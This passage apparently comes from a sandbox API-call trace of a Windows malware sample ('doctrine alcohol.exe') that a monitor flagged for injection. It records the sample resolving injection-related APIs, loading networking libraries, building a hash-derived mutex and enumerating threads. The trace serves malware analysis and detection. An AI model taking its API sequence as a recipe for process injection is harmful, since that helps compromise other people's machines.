(hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.362] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.362] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.363] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.363] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.363] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.363] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.364] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.364] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.364] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.365] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.365] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.365] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.365] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.367] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.367] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.367] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.368] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.368] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.368] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.368] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.369] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.369] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.369] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.369] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.370] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.370] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.370] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.371] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.371] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.371] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.371] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.372] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.372] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.372] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.372] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.373] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.373] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.373] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.374] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.374] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.374] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.374] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.375] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.375] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.375] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.375] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.376] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.376] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.376] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.377] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.377] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.377] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.377] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.378] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.378] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.378] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.378] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.379] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.379] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.379] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.380] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.380] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.380] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.380] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.381] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.381] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.381] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.382] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.382] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.382] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.382] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.383] Thread32Next (hSnapshot=0x9c, lpte=0x2eefce4) returned 1 [0176.511] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x204) returned 0xa0 [0176.511] ResumeThread (hThread=0xa0) returned 0x1 [0176.511] CloseHandle (hObject=0xa0) returned 1 [0176.511] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x990) returned 0xa0 [0176.511] ResumeThread (hThread=0xa0) returned 0x1 [0176.511] CloseHandle (hObject=0xa0) returned 1 [0176.532] CloseHandle (hObject=0x9c) returned 1 [0176.532] VirtualQuery (in: lpAddress=0x411148, lpBuffer=0x2eefcd8, dwLength=0x1c | out: lpBuffer=0x2eefcd8*(BaseAddress=0x411000, AllocationBase=0x3f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.532] GetProcessHeap () returned 0x3f0000 [0176.532] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x411148 | out: hHeap=0x3f0000) returned 1 [0176.532] VirtualQuery (in: lpAddress=0x411038, lpBuffer=0x2eefcd8, dwLength=0x1c | out: lpBuffer=0x2eefcd8*(BaseAddress=0x411000, AllocationBase=0x3f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.532] GetProcessHeap () returned 0x3f0000 [0176.532] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x411038 | out: hHeap=0x3f0000) returned 1 [0176.532] RtlExitUserThread (Status=0x0) Process: id = "41" image_name = "doctrine alcohol.exe" filename = "c:\\program files (x86)\\microsoft.net\\doctrine alcohol.exe" page_root = "0x64ebf000" os_pid = "0x7fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\doctrine alcohol.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 292 os_tid = 0x98c Thread: id = 293 os_tid = 0x7e4 Thread: id = 294 os_tid = 0x760 [0175.574] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0175.574] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0175.574] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0175.574] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0175.574] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0175.574] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0175.574] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0175.575] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0175.576] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0175.577] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0175.577] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0175.577] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0175.577] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0175.577] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0175.577] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0175.577] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0175.577] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0175.577] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0175.577] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0175.577] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0175.577] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0175.577] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0175.578] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0175.584] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0175.584] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0175.584] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0175.588] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0175.589] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0175.589] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0175.589] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0175.589] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0175.589] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0175.589] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0175.589] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0175.589] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0175.589] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0175.589] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0175.589] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0175.592] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0175.593] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0175.593] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0175.593] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0175.593] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0175.593] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0175.593] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0175.593] VirtualProtect (in: lpAddress=0x140000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x2bcf9f4 | out: lpflOldProtect=0x2bcf9f4*=0x40) returned 1 [0175.593] VirtualProtect (in: lpAddress=0x140000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x2bcf9f4 | out: lpflOldProtect=0x2bcf9f4*=0x4) returned 1 [0175.595] VirtualQuery (in: lpAddress=0x150016, lpBuffer=0x2bcf9ec, dwLength=0x1c | out: lpBuffer=0x2bcf9ec*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0175.595] GetProcessHeap () returned 0x750000 [0175.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x364) returned 0x770c18 [0175.595] RtlMoveMemory (in: Destination=0x770c18, Source=0x150016, Length=0x363 | out: Destination=0x770c18) [0175.595] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x150016) returned 0x0 [0175.595] GetCurrentProcessId () returned 0x7fc [0175.595] GetProcessHeap () returned 0x750000 [0175.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x105) returned 0x770f88 [0175.595] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x770f88, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft.NET\\doctrine alcohol.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\doctrine alcohol.exe")) returned 0x39 [0175.595] GetProcessHeap () returned 0x750000 [0175.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x105) returned 0x771098 [0175.595] GetCurrentProcessId () returned 0x7fc [0175.595] wsprintfA (in: param_1=0x771098, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\doctrine alcohol.exe37084212420443") returned 71 [0175.595] CryptAcquireContextA (in: phProv=0x2bcf9f0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2bcf9f0*=0x7711e8) returned 1 [0175.611] CryptCreateHash (in: hProv=0x7711e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2bcf9f4 | out: phHash=0x2bcf9f4) returned 1 [0175.611] lstrlenA (lpString="C:\\Program Files (x86)\\Microsoft.NET\\doctrine alcohol.exe37084212420443") returned 71 [0175.611] CryptHashData (hHash=0x771b08, pbData=0x771098, dwDataLen=0x47, dwFlags=0x0) returned 1 [0175.611] CryptGetHashParam (in: hHash=0x771b08, dwParam=0x2, pbData=0x2bcf9e0, pdwDataLen=0x2bcf9f8, dwFlags=0x0 | out: pbData=0x2bcf9e0, pdwDataLen=0x2bcf9f8) returned 1 [0175.611] wsprintfA (in: param_1=0x771098, param_2="%02X" | out: param_1="A4") returned 2 [0175.611] wsprintfA (in: param_1=0x77109a, param_2="%02X" | out: param_1="91") returned 2 [0175.611] wsprintfA (in: param_1=0x77109c, param_2="%02X" | out: param_1="DB") returned 2 [0175.611] wsprintfA (in: param_1=0x77109e, param_2="%02X" | out: param_1="B3") returned 2 [0175.611] wsprintfA (in: param_1=0x7710a0, param_2="%02X" | out: param_1="D2") returned 2 [0175.611] wsprintfA (in: param_1=0x7710a2, param_2="%02X" | out: param_1="2E") returned 2 [0175.611] wsprintfA (in: param_1=0x7710a4, param_2="%02X" | out: param_1="13") returned 2 [0175.611] wsprintfA (in: param_1=0x7710a6, param_2="%02X" | out: param_1="76") returned 2 [0175.611] wsprintfA (in: param_1=0x7710a8, param_2="%02X" | out: param_1="E1") returned 2 [0175.611] wsprintfA (in: param_1=0x7710aa, param_2="%02X" | out: param_1="73") returned 2 [0175.611] wsprintfA (in: param_1=0x7710ac, param_2="%02X" | out: param_1="3E") returned 2 [0175.611] wsprintfA (in: param_1=0x7710ae, param_2="%02X" | out: param_1="46") returned 2 [0175.611] wsprintfA (in: param_1=0x7710b0, param_2="%02X" | out: param_1="BB") returned 2 [0175.611] wsprintfA (in: param_1=0x7710b2, param_2="%02X" | out: param_1="29") returned 2 [0175.612] wsprintfA (in: param_1=0x7710b4, param_2="%02X" | out: param_1="3C") returned 2 [0175.612] wsprintfA (in: param_1=0x7710b6, param_2="%02X" | out: param_1="62") returned 2 [0175.612] CryptDestroyHash (hHash=0x771b08) returned 1 [0175.612] CryptReleaseContext (hProv=0x7711e8, dwFlags=0x0) returned 1 [0175.612] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="A491DBB3D22E1376E1733E46BB293C62") returned 0x94 [0175.612] GetLastError () returned 0x0 [0175.612] Sleep (dwMilliseconds=0x1f4) [0176.264] GetCurrentProcessId () returned 0x7fc [0176.264] GetCurrentThreadId () returned 0x760 [0176.264] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x9c [0176.267] Thread32First (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.267] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.268] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.268] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.268] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.268] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.269] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.269] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.269] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.270] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.270] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.270] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.270] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.271] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.271] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.271] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.271] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.272] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.272] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.272] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.273] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.273] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.273] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.273] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.274] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.274] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.274] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.275] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.275] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.275] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.275] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.276] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.276] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.276] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.277] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.277] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.277] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.277] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.278] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.278] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.278] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.278] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.279] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.279] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.279] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.279] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.280] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.280] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.280] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.281] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.281] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.281] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.281] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.282] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.282] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.282] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.282] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.283] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.283] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.283] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.284] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.284] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.284] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.284] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.285] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.285] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.285] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.286] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.286] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.286] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.286] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.287] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.287] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.287] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.287] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.288] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.288] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.288] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.289] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.289] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.290] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.290] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.290] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.290] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.291] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.291] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.291] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.292] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.292] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.292] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.292] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.293] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.293] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.293] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.293] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.294] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.294] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 